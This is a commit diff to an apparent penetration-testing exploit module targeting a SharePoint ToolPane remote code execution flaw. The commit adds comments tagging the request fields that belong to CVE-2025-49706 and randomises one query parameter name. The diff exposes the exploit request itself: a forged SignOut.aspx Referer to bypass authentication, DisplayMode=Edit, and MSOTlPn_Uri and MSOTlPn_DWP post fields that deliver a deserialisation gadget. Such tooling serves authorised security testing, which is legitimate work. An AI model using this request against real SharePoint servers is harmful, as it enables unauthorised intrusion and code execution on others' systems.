add some comments to clarify what CVE-2025-49706 is

sfewer-r7 · sfewer-r7 · commit 6d9d9a70d410 · 2025-07-25T11:01:22.000+01:00
diff --git a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -299,14 +299,14 @@ def send_exploit(gadget_raw)
       'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'ToolPane.aspx'),
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' => {
-        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx')
+        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx') # This is part of CVE-2025-49706
       },
       'vars_get' => {
-        'DisplayMode' => 'Edit',
-        'a' => '/ToolPane.aspx'
+        'DisplayMode' => 'Edit', # This is part of CVE-2025-49706
+        Rex::Text.rand_text_alpha_lower(8..16) => '/ToolPane.aspx' # This is part of CVE-2025-49706
       },
       'vars_post' => {
-        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')),
+        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')), # This is part of CVE-2025-49706
         'MSOTlPn_DWP' => xml
       }
     )
